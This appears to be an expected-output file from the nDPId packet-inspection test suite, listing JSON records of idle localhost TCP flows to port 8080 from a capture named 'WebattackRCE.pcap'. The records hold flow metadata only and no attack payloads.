+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7560000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7560000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7560000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7560000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7560000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7560000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 